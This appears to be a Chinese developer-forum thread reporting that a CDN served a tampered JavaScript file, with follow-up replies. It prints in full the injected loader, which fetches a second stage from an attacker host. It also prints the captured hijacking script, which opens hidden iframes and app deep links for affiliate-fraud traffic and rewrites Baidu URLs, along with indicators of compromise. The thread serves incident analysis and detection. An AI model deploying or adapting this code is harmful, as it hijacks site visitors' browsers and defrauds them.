今天上午接到其他地区同事反馈说网站点击按钮没反应,于是自己试了下,手机和电脑都没有问题。下午的时候发现,自己这边也开始出现问题了,排查后发现某个静态 js 资源被篡改了,内容和源站文件完全不一样(不同地区、不同时间表现不一致,这一点本身就值得记录:请把出问题时命中的 CDN 节点 IP 和返回文件的 hash 一起留存,方便和源站对比)。
// Injected payload #1 — the code that was found prepended to / replacing the site's static JS on the
// tampered CDN copy. This is attacker code kept here for analysis; never load it in a browser.
// Two IIFEs, each creating a <script> element and appending it to <body>:
//   1. loads https://gov.papastars.com/dlhao.min.js — the attacker's second stage (captured below);
//   2. loads http://xxxxx//static/js/7.js — "xxxxx" looks like the poster's redaction of the site's own
//      origin host, so this is presumably the attacker re-fetching the original file so the page still
//      works (TODO confirm against the untampered 7.js). Note it is plain http:// with a doubled slash,
//      which is what the post's "跳转应该是要 https" remark refers to; on an https page this request may be
//      blocked as mixed content, which would explain the "button does nothing" symptom.
// Detection hint: a dynamically created <script> whose src is off-origin (gov.papastars.com here) inside a
// file that should be static is the indicator; compare the served file's hash with the origin on every
// CDN node rather than from one client, since only some nodes returned the tampered copy.
(function(){var l=document.createElement('script');l.src='https://gov.papastars.com/dlhao.min.js';document.getElementsByTagName('body')[0].appendChild(l);})();/* stage 2 above; stage "restore original file" below */(function(){var l=document.createElement('script');l.src='http://xxxxx//static/js/7.js';document.getElementsByTagName('body')[0].appendChild(l);})();
之后页面会再加载 dlhao.min.js(下面第二段代码),然后再回源加载原来的 7.js;不过第二段估计没写好,回源地址用的是 http:// 而且多了一个斜杠,应该是要 https——在 https 页面上这个 http 请求会被当作混合内容拦截,页面原有的脚本也就没加载上。
// Injected payload #2 — dlhao.min.js as captured from gov.papastars.com (attacker code; keep for
// analysis, never load it). Read together with the hidden-iframe helper i() below, it does, in order:
//   * unless location.host contains one of the excluded substrings (".gov", bank/telecom/hospital names,
//     a few media and commerce hosts) or the UA is WeChat's in-app browser ("MicroMessenger"), it opens
//     hidden 1px iframes to an attacker landing page and to a random subset of app deep links
//     (openapp.jdmobile://, vipshop://, tbopen://, uclink://, youku://) — this is the "clicking a button
//     pulls up Taobao" symptom from the report (the deep links fire on page load, not on click);
//   * then, on any host, if the top window's URL is a short https://m.baidu.com/?from… URL that does not
//     already carry ?from=1015129o, roughly half the time it rewrites top.location to add that tag
//     (presumably a traffic-attribution code — not verifiable from here).
// Cookies dkwlsn3 / vivi8dd / bbdm2lw (value "y") throttle the three parts to once per ~9 min / 30 min /
// ~9 min, so reloading from the same browser usually shows nothing — reproduce with a fresh profile or
// incognito, and remember the host exclusions when testing from a staging or .gov-like hostname.
// Indicators of compromise: gov.papastars.com (a later reply also reports bank.govsbank.com), the three
// cookie names above, the literal "1015129o", and hidden 1px iframes with app-scheme src values.
!function() { var e = ["https://gov.papastars.com/usany.min.html", 'openapp.jdmobile://virtual?params={"category":"jump","des":"m","url":"https://u.jd.com/1jEOCf","keplerID":"0","keplerFrom":"1","kepler_param":{"source":"kepler-open","otherData":{"mopenbp7":"0"}},"union_open":"union_cps"}', "vipshop://goHome?tra_from=tra%3AC01V006ijfbdtqnu%3A%3Amig_code%3Acps101%3A1cf9efd0abf84e8c94b7e1c01ebe7b2b", "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&h5Url=https%3A%2F%2Fh5.m.taobao.com%2Fbcec%2Fdahanghai-jump.html%3Fspm%3D2014.ugdhh.3907731441.1217-279%26bc_fl_srcgrowth_dhh_3907731441_1217-279&spm=2014.ugdhh.3907731441.1217-279&bc_fl_src=growth_dhh_3907731441_1217-279&materialid=1217", "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=sxmhx&src_ch=sxmhx42&src_scene=pullup&url=ext%3Ainfo_flow_open_channel%3Ach_id%3D100%26insert_item_ids%3D17864229593326336693%26type%3Dmultiple%26from%3D6001", "youku://weex?source=00002204&url=https%3A%2F%2Fmarket.m.taobao.com%2Fyep%2Fweexmaker%2Fykpage%2Fpigspring_wmdt.js%3Fwh_weex%3Dtrue%26refer%3Dsanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700&refer=sanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700"] /* e[0]: attacker landing page; e[1..5]: app deep links for JD, Vipshop, Taobao, UC Browser, Youku */ , t = "y" /* cookie value meaning "already fired" */ , o = "dkwlsn3" /* cookie: deep-link batch fired within the last a hours */ , n = "vivi8dd" /* cookie: landing page fired within the last 0.5 h */ , r = "bbdm2lw" /* cookie: baidu redirect fired within the last a hours */ , a = .15 /* cookie lifetime in hours (~9 min), see m() */ , i = function(e, t) { /* open URL e in a hidden 1px iframe (height "1p" is the attacker's own typo); if t, remove it after 3 s */ var o = document.createElement("iframe"); o.setAttribute("width", "1px"), o.setAttribute("height", "1p"), o.setAttribute("frameborder", "0"), o.setAttribute("scrolling", "no"), o.style.display = "none", o.setAttribute("src", e), document.body.appendChild(o), t && window.setTimeout(function() { document.body.removeChild(o) }, 3e3) } , c = function(e) { /* read cookie e, "" when absent (prefix match on "name=", leading spaces trimmed) */ for (var t = e + "=", o = document.cookie.split(";"), n = 0; n < o.length; n++) { for (var r = o[n]; " " == r.charAt(0); ) r = r.substring(1); if (-1 != r.indexOf(t)) return r.substring(t.length, r.length) } return "" } , m = function(e, t, o) { /* set cookie e=t with path=/ expiring o hours from now */ var n = new Date , r = n.getTime(); r += 3600 * o * 1e3, 
n.setTime(r), document.cookie = e + "=" + t + "; expires=" + n.toUTCString() + "; path=/" }; !function(e, u) { /* e = the URL list, u = navigator; the 3rd and 4th arguments passed below are ignored */ var s = function(e, t) { /* true when lower-cased e contains any entry of t */ if (e) { e = e.toLowerCase(); for (var o in t) if (e.indexOf(t[o]) > -1) return !0 } return !1 } , h = location.host , p = function(e) { /* "is this host a target": false on government, bank, telecom, hospital and a handful of named media/commerce hosts */ var t = new Array(".gov","haiwainet.cn","yhd.com","alipay","p.weibo.com","people","xiangha.com","adipman.net","cnr.cn","17getfun.com","shuixindk.cn","ce.cn","boc","abchina","icbc","10086","51awifi.com","hospital"); return s(e, t) ? !1 : !0 }; if (p(h)) { /* bail out inside WeChat's in-app browser — this return also skips the baidu redirect below */ if (/MicroMessenger/gi.test(u.userAgent)) return; var l = c(n); l != t && (i(e[0], !0), m(n, t, .5)); /* at most once per 30 min: load the landing page in a hidden iframe */ var f = Math.floor(100 * Math.random()) , l = c(o); /* at most once per ~9 min: fire a random subset of the app deep links; the UC link only on UCBrowser UAs */ l != t && (f >= 20 && i(e[1], !0), 80 >= f && i(e[2], !0), (35 > f || f > 75) && i(e[3], !0), u.userAgent.indexOf("UCBrowser") > -1 && Math.floor(100 * Math.random()) > 30 && i(e[4], !0), Math.floor(100 * Math.random()) > 50 && i(e[5], !0), m(o, t, a)) } /* runs on excluded hosts too: if the top window is a short https://m.baidu.com/?from… URL without the attacker's tag, ~half the time rewrite it to carry ?from=1015129o; top.location.href would throw if this ran in a cross-origin frame — not guarded */ var d = top.location.href , l = c(r); l != t && d.length < 40 && "https://m.baidu.com/?from" == d.substring(0, 25) && "?from=1015129o" !== top.location.search && Math.floor(100 * Math.random()) > 50 && (m(r, t, a), top.location.href = "https://m.baidu.com/?from=1015129o") }(e, navigator, document, window.location) }();
点击按钮将直接唤起淘宝之类的 app(实际上是上面脚本在页面加载时通过隐藏 iframe 触发的 app scheme)。至于是哪家 CDN 就不说了;用国外 VPS 测试了一下,返回结果也一样,说明不是本地运营商劫持,而是 CDN 节点返回的文件本身已经被篡改。
1 v2chou 2019-03-06 17:09:59 +08:00 ???你倒是说一下啊。
3 brainmix 2019-03-07 10:06:35 +08:00 我们也碰到这个问题了,有记录下当时 CDN 节点的 IP 吗?
6 abccccabc 2019-03-07 17:28:49 +08:00 被污染了??
7 Moker OP @abccccabc 感觉不像是简单的污染。一般不会劫持 CDN 回源;或者说是劫持了某个节点,然后回源同步导致问题被放大。今天又被搞了一个文件,对方还换域名了。
8 acwong 2019-03-15 18:08:29 +08:00 @brainmix 同样遇到这个问题,域名是 bank.govsbank.com/dlhao.min.js,IP 是 119.28.139.45。
10 fzxml 2019-03-18 09:56:30 +08:00 我也碰到了……dlhao.min.js 加载不出来,导致整个网页加载不出来。
11 j20120307 2019-03-19 02:39:19 +08:00 回源改成 https 就可以。有 root cause 吗?
13 ethusdt 2019-07-17 17:00:53 +08:00